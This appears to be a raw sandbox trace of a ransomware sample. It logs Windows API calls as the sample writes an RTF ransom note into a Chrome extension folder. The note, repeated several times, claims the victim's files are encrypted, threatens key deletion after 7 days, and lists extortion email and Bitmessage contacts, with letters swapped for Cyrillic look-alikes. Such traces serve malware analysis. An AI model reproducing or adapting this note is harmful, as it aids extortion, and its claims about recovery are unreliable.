:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.534] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.535] CloseHandle (hObject=0x228) returned 1 [0284.535] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\#readme_eman#.rtf")) returned 0xffffffff [0284.535] GetLastError () returned 0x2 [0284.535] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 